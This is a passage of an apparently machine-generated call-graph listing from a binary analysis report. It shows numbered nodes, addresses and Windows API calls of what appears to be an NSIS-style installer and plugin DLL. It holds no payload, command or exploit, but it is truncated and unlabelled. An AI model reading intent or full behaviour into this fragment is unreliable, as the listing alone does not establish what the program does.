4868->4869 4870 401a57 4871 402ba2 18 API calls 4870->4871 4872 401a5d 4871->4872 4873 402ba2 18 API calls 4872->4873 4874 401a05 4873->4874 4875 4014d7 4876 402ba2 18 API calls 4875->4876 4877 4014dd Sleep 4876->4877 4879 402a4c 4877->4879 4880 40155b 4881 4029f2 4880->4881 4884 405f9c wsprintfW 4881->4884 4883 4029f7 4884->4883 4760 401ddc 4761 402ba2 18 API calls 4760->4761 4762 401de2 4761->4762 4763 402ba2 18 API calls 4762->4763 4764 401deb 4763->4764 4765 401df2 ShowWindow 4764->4765 4766 401dfd EnableWindow 4764->4766 4767 402a4c 4765->4767 4766->4767 4885 40385c 4886 403867 4885->4886 4887 40386b 4886->4887 4888 40386e GlobalAlloc 4886->4888 4888->4887 4889 4022df 4890 402bbf 18 API calls 4889->4890 4891 4022ee 4890->4891 4892 402bbf 18 API calls 4891->4892 4893 4022f7 4892->4893 4894 402bbf 18 API calls 4893->4894 4895 402301 GetPrivateProfileStringW 4894->4895 4896 401bdf 4897 402ba2 18 API calls 4896->4897 4898 401be6 4897->4898 4899 402ba2 18 API calls 4898->4899 4900 401bf0 4899->4900 4901 401c00 4900->4901 4902 402bbf 18 API calls 4900->4902 4903 401c10 4901->4903 4904 402bbf 18 API calls 4901->4904 4902->4901 4905 401c1b 4903->4905 4906 401c5f 4903->4906 4904->4903 4908 402ba2 18 API calls 4905->4908 4907 402bbf 18 API calls 4906->4907 4909 401c64 4907->4909 4910 401c20 4908->4910 4911 402bbf 18 API calls 4909->4911 4912 402ba2 18 API calls 4910->4912 4913 401c6d FindWindowExW 4911->4913 4914 401c29 4912->4914 4917 401c8f 4913->4917 4915 401c31 SendMessageTimeoutW 4914->4915 4916 401c4f SendMessageW 4914->4916 4915->4917 4916->4917 4918 401960 4919 402ba2 18 API calls 4918->4919 4920 401967 4919->4920 4921 402ba2 18 API calls 4920->4921 4922 401971 4921->4922 4923 402bbf 18 API calls 4922->4923 4924 40197a 4923->4924 4925 40198e lstrlenW 4924->4925 4926 4019ca 4924->4926 4927 401998 4925->4927 4927->4926 4931 406055 lstrcpynW 4927->4931 4929 4019b3 4929->4926 4930 4019c0 lstrlenW 4929->4930 4930->4926 4931->4929 4932 401662 4933 402bbf 18 API calls 4932->4933 4934 401668 4933->4934 4935 406398 2 API calls 4934->4935 4936 40166e 4935->4936 4937 4019e4 4938 402bbf 18 API calls 4937->4938 4939 4019eb 4938->4939 4940 402bbf 18 API calls 4939->4940 4941 4019f4 4940->4941 4942 4019fb lstrcmpiW 4941->4942 4943 401a0d lstrcmpW 4941->4943 4944 401a01 4942->4944 4943->4944 4485 4025e5 4499 402ba2 4485->4499 4487 40263a ReadFile 4494 4025f4 4487->4494 4498 40272d 4487->4498 4488 4026d3 4488->4494 4488->4498 4502 405d0b SetFilePointer 4488->4502 4489 405cad ReadFile 4489->4494 4491 40267a MultiByteToWideChar 4491->4494 4492 40272f 4511 405f9c wsprintfW 4492->4511 4494->4487 4494->4488 4494->4489 4494->4491 4494->4492 4495 4026a0 SetFilePointer MultiByteToWideChar 4494->4495 4496 402740 4494->4496 4494->4498 4495->4494 4497 402761 SetFilePointer 4496->4497 4496->4498 4497->4498 4500 406077 18 API calls 4499->4500 4501 402bb6 4500->4501 4501->4494 4503 405d27 4502->4503 4504 405d43 4502->4504 4505 405cad ReadFile 4503->4505 4504->4488 4506 405d33 4505->4506 4506->4504 4507 405d74 SetFilePointer 4506->4507 4508 405d4c SetFilePointer 4506->4508 4507->4504 4508->4507 4509 405d57 4508->4509 4510 405cdc WriteFile 4509->4510 4510->4504 4511->4498 4945 401e66 4946 402bbf 18 API calls 4945->4946 4947 401e6c 4946->4947 4948 4051b4 25 API calls 4947->4948 4949 401e76 4948->4949 4950 405735 2 API calls 4949->4950 4951 401e7c 4950->4951 4952 401edb CloseHandle 4951->4952 4953 401e8c WaitForSingleObject 4951->4953 4954 40281e 4951->4954 4952->4954 4955 401e9e 4953->4955 4956 401eb0 GetExitCodeProcess 4955->4956 4957 406467 2 API calls 4955->4957 4958 401ec2 4956->4958 4959 401ecd 4956->4959 4960 401ea5 WaitForSingleObject 4957->4960 4962 405f9c wsprintfW 4958->4962 4959->4952 4960->4955 4962->4959 4521 401767 4522 402bbf 18 API calls 4521->4522 4523 40176e 4522->4523 4524 401796 4523->4524 4525 40178e 4523->4525 4562 406055 lstrcpynW 4524->4562 4561 406055 lstrcpynW 4525->4561 4528 401794 4532 4062e9 5 API calls 4528->4532 4529 4017a1 4530 405a09 3 API calls 4529->4530 4531 4017a7 lstrcatW 4530->4531 4531->4528 4539 4017b3 4532->4539 4533 406398 2 API calls 4533->4539 4534 4017ef 4535 405c05 2 API calls 4534->4535 4535->4539 4537 4017c5 CompareFileTime 4537->4539 4538 401885 4540 4051b4 25 API calls 4538->4540 4539->4533 4539->4534 4539->4537 4539->4538 4542 406055 lstrcpynW 4539->4542 4547 406077 18 API calls 4539->4547 4555 40579a MessageBoxIndirectW 4539->4555 4558 40185c 4539->4558 4560 405c2a GetFileAttributesW CreateFileW 4539->4560 4543 40188f 4540->4543 4541 4051b4 25 API calls 4559 401871 4541->4559 4542->4539 4544 403027 32 API calls 4543->4544 4545 4018a2 4544->4545 4546 4018b6 SetFileTime 4545->4546 4548 4018c8 CloseHandle 4545->4548 4546->4548 4547->4539 4549 4018d9 4548->4549 4548->4559 4550 4018f1 4549->4550 4551 4018de 4549->4551 4552 406077 18 API calls 4550->4552 4553 406077 18 API calls 4551->4553 4554 4018f9 4552->4554 4556 4018e6 lstrcatW 4553->4556 4557 40579a MessageBoxIndirectW 4554->4557 4555->4539 4556->4554 4557->4559 4558->4541 4558->4559 4560->4539 4561->4528 4562->4529 4963 404267 lstrlenW 4964 404286 4963->4964 4965 404288 WideCharToMultiByte 4963->4965 4964->4965 4966 401ee9 4967 402bbf 18 API calls 4966->4967 4968 401ef0 4967->4968 4969 406398 2 API calls 4968->4969 4970 401ef6 4969->4970 4971 401f07 4970->4971 4973 405f9c wsprintfW 4970->4973 4973->4971 4974 100018a9 4975 100018cc 4974->4975 4976 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 4975->4976 4977 100018ff GlobalFree 4975->4977 4978 10001272 2 API calls 4976->4978 4977->4976 4979 10001a87 GlobalFree GlobalFree 4978->4979 4980 4021ea 4981 402bbf 18 API calls 4980->4981 4982 4021f0 4981->4982 4983 402bbf 18 API calls 4982->4983 4984 4021f9 4983->4984 4985 402bbf 18 API calls 4984->4985 4986 402202 4985->4986 4987 406398 2 API calls 4986->4987 4988 40220b 4987->4988 4989 40221c lstrlenW lstrlenW 4988->4989 4990 40220f 4988->4990 4992 4051b4 25 API calls 4989->4992 4991 4051b4 25 API calls 4990->4991 4994 402217 4990->4994 4991->4994 4993 40225a SHFileOperationW 4992->4993 4993->4990 4993->4994 4995 40156b 4996 401584 4995->4996 4997 40157b ShowWindow 4995->4997 4998 401592 ShowWindow 4996->4998 4999 402a4c 4996->4999 4997->4996 4998->4999 5000 40456d 5001 4045a3 5000->5001 5002 40457d 5000->5002 5003 404180 8 API calls 5001->5003 5004 404119 19 API calls 5002->5004 5005 4045af 5003->5005 5006 40458a SetDlgItemTextW 5004->5006 5006->5001 5007 40226e 5008 402275 5007->5008 5010 402288 5007->5010 5009 406077 18 API calls 5008->5009 5011 402282 5009->5011 5012 40579a MessageBoxIndirectW 5011->5012 5012->5010 5013 4014f1 SetForegroundWindow 5014 402a4c 5013->5014 5015 401673 5016 402bbf 18 API calls 5015->5016 5017 40167a 5016->5017 5018 402bbf 18 API calls 5017->5018 5019 401683 5018->5019 5020 402bbf 18 API calls 5019->5020 5021 40168c MoveFileW 5020->5021 5022 40169f 5021->5022 5028 401698 5021->5028 5024 406398 2 API calls 5022->5024 5026 4021e1 5022->5026 5023 401423 25 API calls 5023->5026 5025 4016ae 5024->5025 5025->5026 5027 405ef6 38 API calls 5025->5027 5027->5028 5028->5023 5029 4052f3 5030 405314 GetDlgItem GetDlgItem GetDlgItem 5029->5030 5031 40549d 5029->5031 5074 40414e SendMessageW 5030->5074 5033 4054a6 GetDlgItem CreateThread CloseHandle 5031->5033 5034 4054ce 5031->5034 5033->5034 5036 4054f9 5034->5036 5037 4054e5 ShowWindow ShowWindow 5034->5037 5038 40551e 5034->5038 5035 405384 5043 40538b GetClientRect GetSystemMetrics SendMessageW SendMessageW 5035->5043 5040 405533 ShowWindow 5036->5040 5041 40550d 5036->5041 5044 405559 5036->5044 5076 40414e SendMessageW 5037->5076 5042 404180 8 API calls 5038->5042 5047 405553 5040->5047 5048 405545 5040->5048 5045 4040f2 SendMessageW 5041->5045 5046 40552c 5042->5046 5049 4053f9 5043->5049 5050 4053dd SendMessageW SendMessageW 5043->5050 5044->5038 5051 405567 SendMessageW 5044->5051 5045->5038 5056 4040f2 SendMessageW 5047->5056 5055 4051b4 25 API calls 5048->5055 5052 40540c 5049->5052 5053 4053fe SendMessageW 5049->5053 5050->5049 5051->5046 5054 405580 CreatePopupMenu 5051->5054 5058 404119 19 API calls 5052->5058 5053->5052 5057 406077 18 API calls 5054->5057 5055->5047 5056->5044 5059 405590 AppendMenuW 5057->5059 5060 40541c 5058->5060 5061 4055c0 TrackPopupMenu 5059->5061 5062 4055ad GetWindowRect 5059->5062 5063 405425 ShowWindow 5060->5063 5064 405459 GetDlgItem SendMessageW 5060->5064 5061->5046 5065 4055db 5061->5065 5062->5061 5066 405448 5063->5066 5067 40543b ShowWindow 5063->5067 5064->5046 5068 405480 SendMessageW SendMessageW 5064->5068 5069 4055f7 SendMessageW 5065->5069 5075 40414e SendMessageW 5066->5075 5067->5066 5068->5046 5069->5069 5070 405614 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5069->5070 5072 405639 SendMessageW 5070->5072 5072->5072 5073 405662 GlobalUnlock SetClipboardData CloseClipboard 5072->5073 5073->5046 5074->5035 5075->5064 5076->5036 5077 100016b6 5078 100016e5 5077->5078 5079 10001b18 22 API calls 5078->5079 5080 100016ec 5079->5080 5081 100016f3 5080->5081 5082 100016ff 5080->5082 5083 10001272 2 API calls 5081->5083 5084 10001726 5082->5084 5085 10001709 5082->5085 5088 100016fd 5083->5088 5086 10001750 5084->5086 5087 1000172c 5084->5087 5089 1000153d 3 API calls 5085->5089 5091 1000153d 3 API calls 5086->5091 5090 100015b4 3 API calls 5087->5090 5092 1000170e 5089->5092 5093 10001731 5090->5093 5091->5088 5094 100015b4 3 API calls 5092->5094 5095 10001272 2 API calls 5093->5095 5096 10001714 5094->5096 5097 10001737 GlobalFree 5095->5097 5098 10001272 2 API calls 5096->5098 5097->5088 5099 1000174b GlobalFree 5097->5099 5100 1000171a GlobalFree 5098->5100 5099->5088 5100->5088 5101 10002238 5102 10002296 5101->5102 5104 100022cc 5101->5104 5103 100022a8 GlobalAlloc 5102->5103 5102->5104 5103->5102 5105 401cfa GetDlgItem GetClientRect 5106 402bbf 18 API calls 5105->5106 5107 401d2c LoadImageW SendMessageW 5106->5107 5108 401d4a DeleteObject 5107->5108 5109 402a4c 5107->5109 5108->5109 4729 4027fb 4730 402bbf 18 API calls 4729->4730 4731 402802 FindFirstFileW 4730->4731 4732 40282a 4731->4732 4736 402815 4731->4736 4733 402833 4732->4733 4737 405f9c wsprintfW 4732->4737 4738 406055 lstrcpynW 4733->4738 4737->4733 4738->4736 4739 40237b 4740 402381 4739->4740 4741 402bbf 18 API calls 4740->4741 4742 402393 4741->4742 4743 402bbf 18 API calls 4742->4743 4744 40239d RegCreateKeyExW 4743->4744 4745 4023c7 4744->4745 4748 40281e 4744->4748 4746 4023e2 4745->4746 4747 402bbf 18 API calls 4745->4747 4750 402ba2 18 API calls 4746->4750 4752 4023ee 4746->4752 4749 4023d8 lstrlenW 4747->4749 4749->4746 4750->4752 4751 402409 RegSetValueExW 4754 40241f RegCloseKey 4751->4754 4752->4751 4753 403027 32 API calls 4752->4753 4753->4751 4754->4748 5110 1000103d 5111 1000101b 5 API calls 5110->5111 5112 10001056 5111->5112 5113 4014ff 5114 401507 5113->5114 5116 40151a 5113->5116 5115 402ba2 18 API calls 5114->5115 5115->5116 5117 401000 5118 401037 BeginPaint GetClientRect 5117->5118 5119 40100c DefWindowProcW 5117->5119 5121 4010f3 5118->5121 5122 401179 5119->5122 5123 401073 CreateBrushIndirect FillRect DeleteObject 5121->5123 5124 4010fc 5121->5124 5123->5121 5125 401102 CreateFontIndirectW 5124->5125 5126 401167 EndPaint 5124->5126 5125->5126 5127 401112 6 API calls 5125->5127 5126->5122 5127->5126 5128 401904 5129 40193b 5128->5129 5130 402bbf 18 API calls 5129->5130 5131 401940 5130->5131 5132 405846 69 API calls 5131->5132 5133 401949 5132->5133 5134 402d04 5135 402d16 SetTimer 5134->5135 5137 402d2f 5134->5137 5135->5137 5136 402d84 5137->5136 5138 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5137->5138 5138->5136 4512 402786 4513 4029f7 4512->4513 4514 40278d 4512->4514 4515 402ba2 18 API calls 4514->4515 4516 402798 4515->4516 4517 40279f SetFilePointer 4516->4517 4517->4513 4518 4027af 4517->4518 4520 405f9c wsprintfW 4518->4520 4520->4513 4563 100027c7 4564 10002817 4563->4564 4565 100027d7 VirtualProtect 4563->4565 4565->4564 5139 401907 5140 402bbf 18 API calls 5139->5140 5141 40190e 5140->5141 5142 40579a MessageBoxIndirectW 5141->5142 5143 401917 5142->5143 5144 401e08 5145 402bbf 18 API calls 5144->5145 5146 401e0e 5145->5146 5147 402bbf 18 API calls 5146->5147 5148 401e17 5147->5148 5149 402bbf 18 API calls 5148->5149 5150 401e20 5149->5150 5151 402bbf 18 API calls 5150->5151 5152 401e29 5151->5152 5153 401423 25 API calls 5152->5153 5154 401e30 ShellExecuteW 5153->5154 5155 401e61 5154->5155 5161 40490a 5162 404936 5161->5162 5163 40491a 5161->5163 5165 404969 5162->5165 5166 40493c SHGetPathFromIDListW 5162->5166 5172 40577e GetDlgItemTextW 5163->5172 5168 404953 SendMessageW 5166->5168 5169 40494c 5166->5169 5167 404927 SendMessageW 5167->5162 5168->5165 5171 40140b 2 API calls 5169->5171 5171->5168 5172->5167 5173 1000164f 5174 10001516 GlobalFree 5173->5174 5176 10001667 5174->5176 5175 100016ad GlobalFree 5176->5175 5177 10001682 5176->5177 5178 10001699 VirtualFree 5176->5178 5177->5175 5178->5175 4687 402095 4688 402bbf 18 API calls 4687->4688 4689 40209c 4688->4689 4690 402bbf 18 API calls 4689->4690 4691 4020a6 4690->4691 4692 402bbf 18 API calls 4691->4692 4693 4020b0 4692->4693 4694 402bbf 18 API calls 4693->4694 4695 4020ba 4694->4695 4696 402bbf 18 API calls 4695->4696 4698 4020c4 4696->4698 4697 402103 CoCreateInstance 4702 402122 4697->4702 4698->4697 4699 402bbf 18 API calls 4698->4699 4699->4697 4700 401423 25 API calls 4701 4021e1 4700->4701 4702->4700 4702->4701 5179 401a15 5180 402bbf 18 API calls 5179->5180 5181 401a1e ExpandEnvironmentStringsW 5180->5181 5182 401a32 5181->5182 5184 401a45 5181->5184 5183 401a37 lstrcmpW 5182->5183 5182->5184 5183->5184 5185 402515 5186 402bbf 18 API calls 5185->5186 5187 40251c 5186->5187 5190 405c2a GetFileAttributesW CreateFileW 5187->5190 5189 402528 5190->5189 5191 401b16 5192 402bbf 18 API calls 5191->5192 5193 401b1d 5192->5193 5194 402ba2 18 API calls 5193->5194 5195 401b26 wsprintfW 5194->5195 5196 402a4c 5195->5196 5197 10001058 5199 10001074 5197->5199 5198 100010dd 5199->5198 5200 10001516 GlobalFree 5199->5200 5201 10001092 5199->5201 5200->5201 5202 10001516 GlobalFree 5201->5202 5203 100010a2 5202->5203 5204 100010b2 5203->5204 5205 100010a9 GlobalSize 5203->5205 5206 100010b6 GlobalAlloc 5204->5206 5207 100010c7 5204->5207 5205->5204 5208 1000153d 3 API calls 5206->5208 5209 100010d2 GlobalFree 5207->5209 5208->5207 5209->5198 4756 40159b 4757 402bbf 18 API calls 4756->4757 4758 4015a2 SetFileAttributesW 4757->4758 4759 4015b4 4758->4759 4768 40229d 4769 4022a5 4768->4769 4770 4022ab 4768->4770 4771 402bbf 18 API calls 4769->4771 4772 4022b9 4770->4772 4773 402bbf 18 API calls 4770->4773 4771->4770 4774 4022c7 4772->4774 4775 402bbf 18 API calls 4772->4775 4773->4772 4776 402bbf 18 API calls 4774->4776 4775->4774 4777 4022d0 WritePrivateProfileStringW 4776->4777 5210 401f1d 5211 402bbf 18 API calls 5210->5211 5212 401f24 5211->5212 5213 40642b 5 API calls 5212->5213 5214 401f33 5213->5214 5215 401fb7 5214->5215 5216 401f4f GlobalAlloc 5214->5216 5216->5215 5217 401f63 5216->5217 5218 40642b 5 API calls 5217->5218 5219 401f6a 5218->5219 5220 40642b 5 API calls 5219->5220 5221 401f74 5220->5221 5221->5215 5225 405f9c wsprintfW 5221->5225 5223 401fa9 5226 405f9c wsprintfW 5223->5226 5225->5223 5226->5215 5227 40149e 5228 402288 5227->5228 5229 4014ac PostQuitMessage 5227->5229 5229->5228 5230 40249e 5231 402cc9 19 API calls 5230->5231 5232 4024a8 5231->5232 5233 402ba2 18 API calls 5232->5233 5234 4024b1 5233->5234 5235 4024d5 RegEnumValueW 5234->5235 5236 4024c9 RegEnumKeyW 5234->5236 5238 40281e 5234->5238 5237 4024ee RegCloseKey 5235->5237 5235->5238 5236->5237 5237->5238 5240 40231f 5241 402324 5240->5241 5242 40234f 5240->5242 5243 402cc9 19 API calls 5241->5243 5244 402bbf 18 API calls 5242->5244 5245 40232b 5243->5245 5246 402356 5244->5246 5247 402bbf 18 API calls 5245->5247 5250 40236c 5245->5250 5251 402bff RegOpenKeyExW 5246->5251 5248 40233c RegDeleteValueW RegCloseKey 5247->5248 5248->5250 5258 402c76 5251->5258 5259 402c2a 5251->5259 5252 402c50 RegEnumKeyW 5253 402c62 RegCloseKey 5252->5253 5252->5259 5255 40642b 5 API calls 5253->5255 5254 402c87 RegCloseKey 5254->5258 5257 402c72 5255->5257 5256 402bff 5 API calls 5256->5259 5257->5258 5260 402ca2 RegDeleteKeyW 5257->5260 5258->5250 5259->5252 5259->5253 5259->5254 5259->5256 5260->5258 3716 4032a0 SetErrorMode GetVersion 3717 4032d4 3716->3717 3718 4032da 3716->3718 3719 40642b 5 API calls 3717->3719 3807 4063bf GetSystemDirectoryW 3718->3807 3719->3718 3721 4032f1 3722 4063bf 3 API calls 3721->3722 3723 4032fb 3722->3723 3724 4063bf 3 API calls 3723->3724 3725 403305 3724->3725 3810 40642b GetModuleHandleA 3725->3810 3728 40642b 5 API calls 3729 403313 #17 OleInitialize SHGetFileInfoW 3728->3729 3816 406055 lstrcpynW 3729->3816 3731 403350 GetCommandLineW 3817 406055 lstrcpynW 3731->3817 3733 403362 GetModuleHandleW 3734 40337a 3733->3734 3818 405a36 3734->3818 3737 4034b4 GetTempPathW 3822 40326f 3737->3822 3739 4034cc 3740 4034d0 GetWindowsDirectoryW lstrcatW 3739->3740 3741 403526 DeleteFileW 3739->3741 3743 40326f 12 API calls 3740->3743 3832 402dee GetTickCount GetModuleFileNameW 3741->3832 3742 4033a2 3744 405a36 CharNextW 3742->3744 3749 40349d 3742->3749 3751 40349f 3742->3751 3747 4034ec 3743->3747 3744->3742 3746 40353a 3753 405a36 CharNextW 3746->3753 3789 4035dd 3746->3789 3802 4035ed 3746->3802 3747->3741 3748 4034f0 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3747->3748 3752 40326f 12 API calls 3748->3752 3749->3737 3916 406055 lstrcpynW 3751->3916 3757 40351e 3752->3757 3770 403559 3753->3770 3757->3741 3757->3802 3758 403728 3761 403730 GetCurrentProcess OpenProcessToken 3758->3761 3762 4037ac ExitProcess 3758->3762 3759 403608 3940 40579a 3759->3940 3767 403748 LookupPrivilegeValueW AdjustTokenPrivileges 3761->3767 3768 40377c 3761->3768 3764 4035b7 3917 405b11 3764->3917 3765 40361e 3944 40571d 3765->3944 3767->3768 3769 40642b 5 API calls 3768->3769 3784 403783 3769->3784 3770->3764 3770->3765 3775 403798 ExitWindowsEx 3775->3762 3779 4037a5 3775->3779 3776 403634 lstrcatW 3777 40363f lstrcatW lstrcmpiW 3776->3777 3778 40365b 3777->3778 3777->3802 3782 403660 3778->3782 3783 403667 3778->3783 3982 40140b 3779->3982 3781 4035d2 3932 406055 lstrcpynW 3781->3932 3947 405683 CreateDirectoryW 3782->3947 3952 405700 CreateDirectoryW 3783->3952 3784->3775 3784->3779 3860 40389e 3789->3860 3791 40366c SetCurrentDirectoryW 3792 403687 3791->3792 3793 40367c 3791->3793 3956 406055 lstrcpynW 3792->3956 3955 406055 lstrcpynW 3793->3955 3798 4036d3 CopyFileW 3804 403695 3798->3804 3799 40371c 3801 405ef6 38 API calls 3799->3801 3801->3802 3933 4037c4 3802->3933 3803 406077 18 API calls 3803->3804 3804->3799 3804->3803 3806 403707 CloseHandle 3804->3806 3957 406077 3804->3957 3975 405ef6 MoveFileExW 3804->3975 3979 405735 CreateProcessW 3804->3979 3806->3804 3808 4063e1 wsprintfW LoadLibraryW 3807->3808 3808->3721 3811 406451 GetProcAddress 3810->3811 3812 406447 3810->3812 3814 40330c 3811->3814 3813 4063bf 3 API calls 3812->3813 3815 40644d 3813->3815 3814->3728 3815->3811 3815->3814 3816->3731 3817->3733 3819 405a3c 3818->3819 3820 403389 CharNextW 3819->3820 3821 405a43 CharNextW 3819->3821 3820->3737 3820->3742 3821->3819 3985 4062e9 3822->3985 3824 403285 3824->3739 3825 40327b 3825->3824 3994 405a09 lstrlenW CharPrevW 3825->3994 3828 405700 2 API calls 3829 403293 3828->3829 3997 405c59 3829->3997 4001 405c2a GetFileAttributesW CreateFileW 3832->4001 3834 402e2e 3853 402e3e 3834->3853 4002 406055 lstrcpynW 3834->4002 3836 402e54 4003 405a55 lstrlenW 3836->4003 3840 402e65 GetFileSize 3841 402f61 3840->3841 3859 402e7c 3840->3859 4008 402d8a 3841->4008 3843 402f6a 3845 402f9a GlobalAlloc 3843->3845 3843->3853 4043 403258 SetFilePointer 3843->4043 4019 403258 SetFilePointer 3845->4019 3846 402fcd 3850 402d8a 6 API calls 3846->3850 3849 402fb5 4020 403027 3849->4020 3850->3853 3851 402f83 3854 403242 ReadFile 3851->3854 3853->3746 3856 402f8e 3854->3856 3855 402d8a 6 API calls 3855->3859 3856->3845 3856->3853 3857 402fc1 3857->3853 3857->3857 3858 402ffe SetFilePointer 3857->3858 3858->3853 3859->3841 3859->3846 3859->3853 3859->3855 4040 403242 3859->4040 3861 40642b 5 API calls 3860->3861 3862 4038b2 3861->3862 3863 4038b8 GetUserDefaultUILanguage 3862->3863 3864 4038ca 3862->3864 4064 405f9c wsprintfW 3863->4064 4074 405f22 RegOpenKeyExW 3864->4074 3867 4038c8 4065 403b74 3867->4065 3869 403919 lstrcatW 3869->3867 3870 405f22 3 API calls 3870->3869 3873 405b11 18 API calls 3874 40394b 3873->3874 3875 4039df 3874->3875 3877 405f22 3 API calls 3874->3877 3876 405b11 18 API calls 3875->3876 3878 4039e5 3876->3878 3879 40397d 3877->3879 3880 4039f5 LoadImageW 3878->3880 3881 406077 18 API calls 3878->3881 3879->3875 3884 40399e lstrlenW 3879->3884 3888 405a36 CharNextW 3879->3888 3882 403a9b 3880->3882 3883 403a1c RegisterClassW 3880->3883 3881->3880 3887 40140b 2 API calls 3882->3887 3885 403a52 SystemParametersInfoW CreateWindowExW 3883->3885 3886 403aa5 3883->3886 3889 4039d2 3884->3889 3890 4039ac lstrcmpiW 3884->3890 3885->3882 3886->3802 3891 403aa1 3887->3891 3892 40399b 3888->3892 3894 405a09 3 API calls 3889->3894 3890->3889 3893 4039bc GetFileAttributesW 3890->3893 3891->3886 3896 403b74 19 API calls 3891->3896 3892->3884 3895 4039c8 3893->3895 3897 4039d8 3894->3897 3895->3889 3899 405a55 2 API calls 3895->3899 3900 403ab2 3896->3900 4079 406055 lstrcpynW 3897->4079 3899->3889 3901 403b41 3900->3901 3902 403abe ShowWindow 3900->3902 4080 405287 OleInitialize 3901->4080 3903 4063bf 3 API calls 3902->3903 3905 403ad6 3903->3905 3907 403ae4 GetClassInfoW 3905->3907 3910 4063bf 3 API calls 3905->3910 3906 403b47 3908 403b63 3906->3908 3909 403b4b 3906->3909 3912 403af8 GetClassInfoW RegisterClassW 3907->3912 3913 403b0e DialogBoxParamW 3907->3913 3911 40140b 2 API calls 3908->3911 3909->3886 3914 40140b 2 API calls 3909->3914 3910->3907 3911->3886 3912->3913 3915 40140b 2 API calls 3913->3915 3914->3886 3915->3886 3916->3749 4095 406055 lstrcpynW 3917->4095 3919 405b22 4096 405ab4 CharNextW CharNextW 3919->4096 3922 4035c3 3922->3802 3931 406055 lstrcpynW 3922->3931 3923 4062e9 5 API calls 3924 405b38 3923->3924 3924->3922 3925 405b69 lstrlenW 3924->3925 3930 405a55 2 API calls 3924->3930 4102 406398 FindFirstFileW 3924->4102 3925->3924 3926 405b74 3925->3926 3927 405a09 3 API calls 3926->3927 3929 405b79 GetFileAttributesW 3927->3929 3929->3922 3930->3925 3931->3781 3932->3789 3934 4037dc 3933->3934 3935 4037ce CloseHandle 3933->3935 4105 403809 3934->4105 3935->3934 3941 4057af 3940->3941 3942 4057c3 MessageBoxIndirectW 3941->3942 3943 403616 ExitProcess 3941->3943 3942->3943 3945 40642b 5 API calls 3944->3945 3946 403623 lstrcatW 3945->3946 3946->3776 3946->3777 3948 403665 3947->3948 3949 4056d4 GetLastError 3947->3949 3948->3791 3949->3948 3950 4056e3 SetFileSecurityW 3949->3950 3950->3948 3951 4056f9 GetLastError 3950->3951 3951->3948 3953 405710 3952->3953 3954 405714 GetLastError 3952->3954 3953->3791 3954->3953 3955->3792 3956->3804 3966 406084 3957->3966 3958 4062cf 3959 4036c6 DeleteFileW 3958->3959 4164 406055 lstrcpynW 3958->4164 3959->3798 3959->3804 3961 406137 GetVersion 3961->3966 3962 40629d lstrlenW 3962->3966 3965 406077 10 API calls 3965->3962 3966->3958 3966->3961 3966->3962 3966->3965 3967 405f22 3 API calls 3966->3967 3968 4061b2 GetSystemDirectoryW 3966->3968 3969 4061c5 GetWindowsDirectoryW 3966->3969 3970 4062e9 5 API calls 3966->3970 3971 4061f9 SHGetSpecialFolderLocation 3966->3971 3972 406077 10 API calls 3966->3972 3973 40623e lstrcatW 3966->3973 4162 405f9c wsprintfW 3966->4162 4163 406055 lstrcpynW 3966->4163 3967->3966 3968->3966 3969->3966 3970->3966 3971->3966 3974 406211 SHGetPathFromIDListW CoTaskMemFree 3971->3974 3972->3966 3973->3966 3974->3966 3976 405f17 3975->3976 3977 405f0a 3975->3977 3976->3804 4165 405d84 lstrcpyW 3977->4165 3980 405774 3979->3980 3981 405768 CloseHandle 3979->3981 3980->3804 3981->3980 3983 401389 2 API calls 3982->3983 3984 401420 3983->3984 3984->3762 3991 4062f6 3985->3991 3986 40636c 3987 406371 CharPrevW 3986->3987 3989 406392 3986->3989 3987->3986 3988 40635f CharNextW 3988->3986 3988->3991 3989->3825 3990 405a36 CharNextW 3990->3991 3991->3986 3991->3988 3991->3990 3992 40634b CharNextW 3991->3992 3993 40635a CharNextW 3991->3993 3992->3991 3993->3988 3995 40328d 3994->3995 3996 405a25 lstrcatW 3994->3996 3995->3828 3996->3995 3998 405c66 GetTickCount GetTempFileNameW 3997->3998 3999 40329e 3998->3999 4000 405c9c 3998->4000 3999->3739 4000->3998 4000->3999 4001->3834 4002->3836 4004 405a63 4003->4004 4005 402e5a 4004->4005 4006 405a69 CharPrevW 4004->4006 4007 406055 lstrcpynW 4005->4007 4006->4004 4006->4005 4007->3840 4009 402d93 4008->4009 4010 402dab 4008->4010 4011 402da3 4009->4011 4012 402d9c DestroyWindow 4009->4012 4013 402db3 4010->4013 4014 402dbb GetTickCount 4010->4014 4011->3843 4012->4011 4044 406467 4013->4044 4016 402dc9 CreateDialogParamW ShowWindow 4014->4016 4017 402dec 4014->4017 4016->4017 4017->3843 4019->3849 4021 403040 4020->4021 4022 40306e 4021->4022 4050 403258 SetFilePointer 4021->4050 4024 403242 ReadFile 4022->4024 4025 403079 4024->4025 4026 4031db 4025->4026 4027 40308b GetTickCount 4025->4027 4035 4031c5 4025->4035 4028 40321d 4026->4028 4033 4031df 4026->4033 4027->4035 4039 4030da 4027->4039 4029 403242 ReadFile 4028->4029 4029->4035 4030 403242 ReadFile 4030->4039 4031 403242 ReadFile 4031->4033 4032 405cdc WriteFile 4032->4033 4033->4031 4033->4032 4033->4035 4034 403130 GetTickCount 4034->4039 4035->3857 4036 403155 MulDiv wsprintfW 4051 4051b4 4036->4051 4039->4030 4039->4034 4039->4035 4039->4036 4048 405cdc WriteFile 4039->4048 4062 405cad ReadFile 4040->4062 4043->3851 4045 406484 PeekMessageW 4044->4045 4046 402db9 4045->4046 4047 40647a DispatchMessageW 4045->4047 4046->3843 4047->4045 4049 405cfa 4048->4049 4049->4039 4050->4022 4052 405271 4051->4052 4053 4051cf 4051->4053 4052->4039 4054 4051eb lstrlenW 4053->4054 4057 406077 18 API calls 4053->4057 4055 405214 4054->4055 4056 4051f9 lstrlenW 4054->4056 4059 405227 4055->4059 4060 40521a SetWindowTextW 4055->4060 4056->4052 4058 40520b lstrcatW 4056->4058 4057->4054 4058->4055 4059->4052 4061 40522d SendMessageW SendMessageW SendMessageW 4059->4061 4060->4059 4061->4052 4063 403255 4062->4063 4063->3859 4064->3867 4066 403b88 4065->4066 4087 405f9c wsprintfW 4066->4087 4068 403bf9 4069 406077 18 API calls 4068->4069 4070 403c05 SetWindowTextW 4069->4070 4071 403c21 4070->4071 4072 403929 4070->4072 4071->4072 4073 406077 18 API calls 